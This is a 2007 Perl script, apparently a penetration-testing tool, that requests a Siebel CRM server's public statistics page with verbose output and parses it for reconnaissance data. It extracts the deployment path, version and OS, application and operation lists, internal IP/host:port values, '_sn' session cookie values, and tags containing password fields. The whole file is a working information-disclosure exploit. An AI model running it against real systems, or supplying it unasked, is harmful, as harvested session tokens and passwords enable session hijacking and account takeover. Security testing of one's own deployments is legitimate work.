#!/usr/bin/perl -w
#
# siebel_stats.pl - Script to gather information disclosed by Siebel CRM Stats page
# January 2007, Sheran Gunasekera < sheran(at)zensay(dot)com >
#
# Please mail me if you come across a newer Siebel version or a version of the stats
# page that does not work well with the script.
#
# This script is intended to gather information from a Siebel server which has its
# statistics page visible.  While most of the results from the stats page is readable
# this script can quickly pick up the more important points of the stats page.
# 
# 
#

use strict;
use LWP::UserAgent;
use Getopt::Long;

my ($o_help, $o_host, $o_app, $o_ssl, $o_verb, $o_proto);
my ($response_code, $content, $output);

my ($app_part, $app_tag_len, $tags, $count);
my (@app_tags, @app_count, @op_tags, @ips, @sn, @passwd);
my $app_x = 0;

GetOptions( "help"=>\$o_help,
						"h=s" =>\$o_host,
						"a=s" =>\$o_app,
						"s"   =>\$o_ssl,
						"v"   =>\$o_verb);
						
# Check Arguments

if ((!$o_host) || (!$o_app)){
	usage();
}

# Check if SSL is asked for.  Crypt::SSLeay is required otherwise you'll get a 501 repsonse code.

if ($o_ssl) {
	$o_proto = 'https://';
} else {
	$o_proto = 'http://';
}

# Execute Get request 
print "Attempting to fetch statistics page...\n";
fetch_page();

# If code 200 is received, then proceed.  Otherwise quit.
if ($response_code ne 200) {
	print "$response_code received, quitting because not HTTP 200.\n";
	exit;
}

print "Examining content...\n\n";
print process_initial();
process_deploy();
process_apps();

if ($content =~ /.*?<b>Duration<\/b><\/td><\/tr><\/table>.*/) {
		print "- No Operations Found.\n";
	} else {
		process_ops();
		process_opt_tags();
	}




						
						
						
sub usage {
	print "\nUsage: siebel_stats.pl -h <hostname> -A <application> [options]\n\n";
  print "    Options:\n";
  print "      -help\t\tHelp text\n";
  print "      -h\t\tHostname of Server\n";
  print "      -a\t\tSiebel Application being used\n";
  print "      -s\t\tUse SSL (Requires package Crypt::SSLeay)\n";
  print "      -v\t\tVerbose output\n";
  #print "      -l <count>\tLoop <count> times to collect Operation Arguments\n";
	exit;
}



sub fetch_page {
	
	my $agent = LWP::UserAgent->new;
	$agent->agent("Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)");
	$agent->timeout(60);
	my $request = HTTP::Request->new(GET => $o_proto.$o_host.'/'.$o_app.'/_stats.swe?verbose=high');
	my $response = $agent->request($request);
  $response_code = $response->code;
	$content = $response->content;
}

sub process_initial {
	
	if ($content =~ /.*?This report produced by the \<i\>Siebel Web Engine\<\/i\> \(SWE\).*/) 
	{
		$output = "+ Content verified as Siebel Web Engine Report.\n";
	} else {
		print "- Cannot verify content automagically, please perform a manual check.";
		exit;
	}
}

sub process_deploy {
	if ($content =~ /.*?Web\sPublish\s(.*?)<br>.*/) {
			print "==> Deployed Directory: ".$1."\n";
			my $direc = $1;
		if ($1 =~ /.*?sea([0-9]{1,3}).*/) {
				my $version = join('.',split(//,$1));
				print "==> Possible Siebel Version: ".$version."\n\n";
		}
	
		if ($direc =~ /^[a-z,A-Z]{1}:\\.*?/) {
				print "+ Possible deployment on a Windows Server\n\n";
		} else {
				print "+ Not deployed on a Windows Server\n\n";
		}
	} else {
		print "- Unable to identify deployment directory.\n\n";
	}
}

sub process_apps {
		
	
	
	if ($content =~ /.*(<table.*<b>Application Name.*?<\/table.*?>)/s) {
		$app_part = $1;
	}
	
	while ($app_part=~ /<tr><td.*?>(.*?)[<br>]{0,}<\/td><td.*?>(.*?)<\/td>/g) {
		if ($1 =~ /.*?Session Lifespan/) {
			next;
		}
		$app_tags[$app_x] = $1;
		$app_count[$app_x] = $2;
		$app_x++;
	}
	$app_tag_len = scalar(@app_tags);
	
	print "+ Applications visible [Name:Count]\n";
			
	for (my $y=1;$y<$app_tag_len;$y++) {
		$tags = $app_tags[$y];
		$count = $app_count[$y];
		
		$tags =~ s/\///g;
		
		for ($tags) {
			s/^\s+//;
			s/\s+$//;
		}
		
		for ($count) {
			s/^\s+//;
			s/\s+$//;
		}
		
		print "==> ".$tags." \t\t:".$count."\n";
	}
	print "\n";
}

sub process_ops {
	$app_x = 0;
	undef @app_tags;
	
	
	if ($content =~ /.*(<table.*<b>Operation.*?<\/table.*?>)/s) {
		$app_part = $1;
	}
	
	while ($app_part=~ /<tr><td.*?>(.*?)<\/td><td.*?>/sg) {
		$app_tags[$app_x] = $1;
		$app_x++;
	}
	$app_tag_len = scalar(@app_tags);
	my $p_ops = $app_tag_len - 1;
	
	print "+ Operations being processed: $p_ops\n\n";
			
	for (my $y=1;$y<$app_tag_len;$y++) {
		$tags = $app_tags[$y];
		
		for ($tags) {
			s/^\s+//;
			s/\s+$//;
		}
		
		push(@op_tags,$tags);
		
		if ($o_verb) {
			print $tags."\n\n";
		}
	}
	
}

sub process_opt_tags {
	my $opt;
	
	foreach $opt (@op_tags) {
		if ($opt =~ /.*?siebel.TCPIP.*?:\/\/(.*?)\//) {
			push(@ips,$1);
		}
		if ($opt =~ /.*?\&_sn=(.*?)\&/s) {
			push(@sn,$1);
		}
		if ($opt =~ /SWEPasswordField/s) {
			push(@passwd,$opt);
	}
	
}
	if (@sn) {
		print "\n+ _sn cookie values found\n";
		foreach my $ssn (@sn) {
			print "==> _sn value: ".$ssn."\n";
		}
	}
	
	if (@ips) {
		print "\n+ IP/Hostnames & ports found\n";
		foreach my $sips (@ips) {
			print "==> ip/host:port-> ".$sips."\n";
		}
	}
	
	if (@passwd) {
		print "\n!! Possible passwords being transmitted - inspect the whole tag manually\n";
		foreach my $spasswd (@passwd) {
			print "==> ".$spasswd."\n\n";
		}
	}
	
			
}